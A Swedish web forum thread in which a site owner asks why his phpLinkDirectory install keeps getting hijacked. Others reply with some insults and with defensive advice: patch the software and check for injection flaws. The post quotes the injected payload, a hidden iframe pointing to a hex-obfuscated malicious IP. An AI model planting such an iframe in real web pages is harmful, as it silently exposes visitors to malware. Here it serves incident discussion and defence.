[Davve]

Jag har phplinkdirectory installerat på en av mina domäner, nu är det så att det sker konstiga saker, någon hackar sig in. För några dagars edan kapade de hela siten och länkade till nån rysk site. Nu lägger de litte denna koden efter </body>

Vad kan det vara och hur kan jag få slut på det?

<iframe src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6' style='visibility: hidden;'>
</iframe>

[Robert]

"This directs to a malicious site in a hidden frame. The "address" 0xcb.0xdf.0x9e.0x0c translates to 203.223.158.12 which is a Malaysian IP."

[Davve]

Vad kan man göra för att det ska få ett slut?

[grazzy]

Vem är idioten?

Personen som har kodat de felaktiga skripten DU har installerat.
Personen som utnyttjar hålen i mjukvaran DU använder.
Eller personen som inte kan fixa problemet på ett forum som just har haft en närmast identisk diskussion där du själv just har deltagit.

[Davve]

Gazzy, ditt liv måste vara rät så tråkigt som du svarar på de flesta inlägg. I mina ögon är det de som förstör för andra som är idioter, i dina verkar alla utom dig själv vara

Jag ber dig att strunta i mina trådar då det är väldigt sällan du har nåt vettigt att säga.


Jag tar gärna emot tips på hur jag kan få slut på dessa hackningar.

/davve

[grazzy]

Davve,

Det finns tre sätt
1) Tig om hjälp här på wn tills nån här mot all förmodan har hjälpt dig med alla dina problem
2) Anställ nån som löser dina problem.
3) Lös dem själv genom att läsa all tillgänglig information om problemen. Detta inkluderar åtminstonde att du besöker webbsidorna för all mjukvara du använder på din server och kontrollerar att du inte kör någon version som är sårbar för säkerhetsproblem. Att du kollar igenom all din egenhändigt skapade kod efter uppenbara brister, XSS-injections, SQL-injections, filuppladdningar, inloggningar osv. Sedan bör du även ta reda på lite mera konkret fakta om säkerhet på internet, kanske tom delta i en kurs på högskolenivå för att få de abstrakta bitarna lite klarar för dig.

Det du håller på med nu, dvs famla i mörker kommer inte att leda dig eller någon annan här på forumet till en särskilt ljusare framtid.

Ang. sluta läsa trådar, tyvärr finns ingen ignore-funktion och jag har det inte heller den funktionen i huvudet - om du vill kan jag börja anmäla dina trådar till moderatorerna så att dem kanske tas bort istället. Det skulle funka för mig....

[Davve]

Jag tror du har missat den grundlägande poängen med ett forum Grazzy, ett forum är till för att ta hjälp av andra eller ge hjälp, just detta för webmasters alltså de som jobbar med webben. Det är inte ett forum för de som kan allt, vill du ha ett sådant, öppna ett då!

Efterson du inte hjälper, iaf inte i mina trådar, så är det som sagt bättre att du slutar läsa.

Citat:

Ang. sluta läsa trådar, tyvärr finns ingen ignore-funktion och jag har det inte heller den funktionen i huvudet - om du vill kan jag börja anmäla dina trådar till moderatorerna så att dem kanske tas bort istället. Det skulle funka för mig....

Du är väl inte helt blind? Kan väl titta vem som startar tråden så slipper du tröga ner dina fingertoppar på att skriva onödiga inlägg.

[Westman]

Davve, sållar man lite så är Grazzy lite på rätt spår i punkt tre. Det troliga är att den kod du har på sajten är sårbar och själva hacket görs troligtvis via skript som skannar sajter. Kontrollera att du har senaste versionen osv. Skulle intrånget ske via egentillverkad kod blir lite jobbigare att täppa till.

Ett annat alternativ är att skrivskydda filen som ändras men det är bara en snabblagning och löser inte problemet i stort.

EDIT: Såg att det var phplinkdirectory och ändrade lite i texten

[jonny]

Om diskussionen om hur Grazzy ska uttrycka sig eller inte fortsätter blir det dags att rensa lite i tråden. Så återgå till ämnet, tack.

Kör du senaste versionen av phplinkdirectory (som jag förmodar är vad 99% av alla katalogtjänster - där bara häflten fungerar - använder)?